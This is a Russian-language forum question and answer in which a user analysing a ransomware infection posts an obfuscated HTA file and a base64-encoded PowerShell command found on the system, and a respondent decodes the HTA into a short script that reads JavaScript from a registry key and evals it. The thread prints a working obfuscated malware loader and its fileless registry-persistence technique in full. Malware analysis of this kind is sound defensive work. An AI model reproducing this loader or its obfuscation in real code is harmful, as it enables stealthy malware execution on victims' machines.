HTA-файл с кодом заражения.Кодируется HEX и другими средствами - PullRequest
1 голос
/ 03 июля 2019

Этот файл был обнаружен в зараженной системе.В системе обнаружена запись реестра, которая вызывает внешние вредоносные веб-сайты для отображения начала заражения вымогателями.Я пытаюсь расшифровать его, чтобы найти зараженный файл.Я считаю, что это услуга.

Я попытался декодировать часть кода HEX (\ x66) и тому подобное, но все идет в переменную, и похоже, что некоторые переменные команды меняют вход, еще больше маскируя, каким будет выход.Я не достаточно знаком с JS, чтобы знать, что происходит, но это действительно интересно.

Это был код BASE64 после вызова команды powershell из неизвестного источника моего поиска:

JAB7AHIAYABlAGcAfQA9ACcASABLAEwATQAnADsAJAB7AFIARQBnAHAAYABBAGAAVABoAH0APQAnADcAcwBQAEYAUAA3AEIANwBHAEYAJwA7ACQAewBSAGAAZQBnAGAAawBlAHkAbgBhAE0ARQB9AD0AJwB0ADMAVgBWAG4ATgB0ADcAZQBVACcAOwAkAHsAcABgAEEAUgBhAG0AfQA9ACcAbABJAE0AbgB0AEMAUwA4AGwATAAnADsAJAB7AEYAdQBMAGAAbAByAGAARQBHAH0APQAkAHsAcgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQAiAC0AZgAnAGYAWABMACcALAAnADoAZgAnACwAJwBTAG8AZgB0AHcAJwAsACcAWABMACcALAAnAGEAcgBlACcAKQApAC4AIgByAGAARQBwAGwAYABBAEMARQAiACgAKABbAEMASABBAFIAXQAxADAAMgArAFsAQwBIAEEAUgBdADgAOAArAFsAQwBIAEEAUgBdADcANgApACwAWwBTAHQAcgBJAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKwAkAHsAcgBgAEUARwBwAGAAQQBUAEgAfQA7ACQAewBFAGAAeABgAHAAUgBFAGAAcwBTAEkATwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBHACcALAAnAHIAbwBwACcALAAnAGUAcgB0AHkAJwAsACcAZQB0AC0ASQB0AGUAbQBQACcAKQAgACQAewBmAGAAVQBgAEwATAByAGUAZwB9ACkALgAkAHsAUABhAFIAYABBAE0AfQA7AC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAaQAnACwAJwBlAHgAJwApACgAJAB7AGUAWABgAHAAUgBlAHMAcwBgAGkAbwBOAH0AKQA=

После декодирования смутно показывает созданную запись реестра.

Это был файл в системе.Я добавил пробелы / LF для облегчения просмотра.

<HTA:APPLICATION ID="xAIAv5nyFFnT" 
APPLICATIONNAME="qzEserCEK" 
SCROLL="auto" 
SINGLEINSTANCE="yes" 
CAPTION="no" 
BORDER="none" 
SHOWINTASKBAR="no" 
INNERBORDER="no" 
WINDOWSTATE="minimize">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>tzEg1b54H</title><script>

jsibjKf9='HKLM\\Software\\Wow6432Node\\';

A41IZs4sH=jsibjKf9+'7sPFP7B7GF'+'\\'+'WVSMOZtXy8';

fVTKUU4Z='h'+'\x66'+'iei7'+['swY','iueh','U9Q'][1];

uAlUHoEI4='\x66';

mUrRZBlw=['hon','f','Ylz'][1];

PBMSNkV=uAlUHoEI4+mUrRZBlw;

sJpxcf4ckU=PBMSNkV+mUrRZBlw;

CAxiNPV=['dt9','q9','Ig98'][1]+['oT8N','JMk','bwkq','y7t6'][3]+sJpxcf4ckU;

bgWd1m='ds'+'b'+['LgE','A6nX','us','\x4e\x35\x63\x6a'][2]+CAxiNPV;

TvfsJFqm=['df','E_oB','JpG','Q21T'][0]+['jc3','UVF','vQUq','s'][3]+sJpxcf4ckU+'8'+'y'+'n'+'7';

fNpaIhi='\x64'+'f'+'\x68'+['7e','_DW','f_kE'][0]+bgWd1m+['fcP','QFt','hu'][2];

mq67_LC_Y=['ci5v','eh','Bv8'][1]+uAlUHoEI4+['wORH','GHpQ','qYsT','if'][3]+fNpaIhi+['uw','o6n','YqFF','eQTd'][0];

try{throw new Error(['qrau','zWt','hSs','.'][3]);
}
catch(x9y094wnx2)
{fVTKUU4Z=x9y094wnx2[['mAW','pAwK','nGD','mess'][3]+['qJM','age','bA_'][1]];
}
try
{throw new Error(['wcM5','EK4T','s','kwv6'][2]);
}
catch(MSFbXy)
{mUrRZBlw=MSFbXy[['mes','xto','qSY'][0]+['ZL1','N1b','sag'][2]+['ofr7','e','n94E','bfw'][1]];
}
try
{throw new Error('l');
}
catch(mo_NzYG)
{PBMSNkV=mo_NzYG[['yKAP','mess','Vx3Y'][1]+['age','\x6b\x33\x46','HstV','Sy2S'][0]];
}
try
{throw new Error(['zF62','c','Jwd','ILd'][1]);
}
catch(olcqTW)
{sJpxcf4ckU=olcqTW['\x6d'+'es'+['sag','ThL','ba8D'][0]+'e'];
}
try
{throw new Error('e');
}
catch(UCk3C3)
{uAlUHoEI4=UCk3C3[['lsiE','tEV','NpZQ','mess'][3]+['Gdg','MR0D','age'][2]];
}
try
{throw new Error('t');
}
catch(d8hyM21)
{CAxiNPV=d8hyM21['mess'+['ag','rrc','msGL'][0]+'e'];
}
try
{throw new Error(['i','idyq','s23J','\x77\x67\x38'][0]);
}
catch(FH2wspm)
{bgWd1m=FH2wspm['m'+'es'+['JXZc','\x73\x61\x67','rUs','fCW'][1]+['MAU','e','qM58'][1]];
}
try
{throw new Error(['Dwfy','v','IDK'][1]);
}
catch(nWUuLDh)
{TvfsJFqm=nWUuLDh[['pYF','\x6a\x73\x30\x4b','mes','wO2'][2]+['rNO9','giiJ','sage'][2]];
}
try
{throw new Error(['iy5Z','cE7','t'][2]);
}
catch(lJtpvPh9X)
{CAxiNPV=lJtpvPh9X[['me','NTrH','J4ju'][0]+'\x73\x73'+'a'+['XbGB','\x57\x72\x32','ge'][2]];
}
try
{throw new Error('\x53');
}
catch(hWWGLap){fNpaIhi=hWWGLap[['\x63\x39\x44\x43','xQk','mes','wM2c'][2]+['crOJ','bqZ','sag'][2]+['ngu','e','qjMR'][1]];
}
try
{throw new Error('\x52');
}
catch(WH4uWp9)
{mq67_LC_Y=WH4uWp9['\x6d\x65'+'ss'+'a'+'g'+'\x65'];
}
NWGvw4i=sJpxcf4ckU+'o'+['v2rO','\x6e','hye'][1]+mUrRZBlw+['Gbi','fxP','t'][2]+['l_Xf','fw54','r'][2]+['VMW1','UTu','u'][2]+sJpxcf4ckU+['t','BY9z','viM'][0]+'o'+['onm_','ZnJ','r'][2];
R18YNC6JjX=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV+['("','zQyX','RCL','Qi9'][0]+'X'+'Y1'+'J'+'_'+'\x77\x3d'+['eeQ','UYMS','Fi4','th'][3]+bgWd1m+mUrRZBlw+['\x5a\x66\x36','ykW',';
"','_of'][2]+')';

EQIJC3=['JJgq','PRb','Vlpy','W'][3]+fNpaIhi+sJpxcf4ckU+['r','\x57\x6c\x79','DWsl','df2'][0]+bgWd1m+['\x75\x36\x6b\x34','QW3','\x70\x74','\x77\x4f\x62\x4d'][2]+fVTKUU4Z+fNpaIhi+'\x68'+uAlUHoEI4+PBMSNkV+PBMSNkV;

dMVY8_=['jaqb','XDga','VJB1','A'][3]+sJpxcf4ckU+['vIr','YrFz','t','QoUm'][2]+bgWd1m+TvfsJFqm+uAlUHoEI4+['s16r','RuU','XObj'][2]+uAlUHoEI4+sJpxcf4ckU+'t';

xx3EjCVo31=mq67_LC_Y+uAlUHoEI4+['\x67','RQF','DXk','\x6c\x76\x64'][0]+mq67_LC_Y+uAlUHoEI4+['OmuP','ad','CCx'][1];

VLGRE1kdNk=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV;

B7EpHr=sJpxcf4ckU+PBMSNkV+['o','\x43\x78\x68','F9g'][0]+mUrRZBlw+uAlUHoEI4;

kR4Di8izVe=PBMSNkV+sJpxcf4ckU+CAxiNPV;

dBdlTCP=kR4Di8izVe[NWGvw4i][NWGvw4i];

_BoofMt4aj=dBdlTCP(R18YNC6JjX)();

try
{KMAswI3=new XY1J_w[dMVY8_](EQIJC3);
}
catch(_0UaAgblja)
{}
try{XY1J_w[VLGRE1kdNk](KMAswI3[xx3EjCVo31](A41IZs4sH));
}
catch(OmTqGis0dj)
{}
XY1J_w[B7EpHr]();

</script></head><body>
mvv7zDBzZULpDtQJ7JJkXKv5Wo2XP9vrVzzzycCz06nQGZEdFQXj_rbFLgwjIy

</body>

1 Ответ

1 голос
/ 03 июля 2019

Полезная нагрузка по существу выполняет следующее

try {
  wshell = new ActiveXObject('WScript.Shell');
  eval(wshell.RegRead('HKLM\\Software\\Wow6432Node\\7sPFP7B7GF\\WVSMOZtXy8'));
} catch (error) {}

window.close();

Я полагаю, вы найдете гораздо более запутанный код JavaScript в этой записи реестра.

Удачи.

...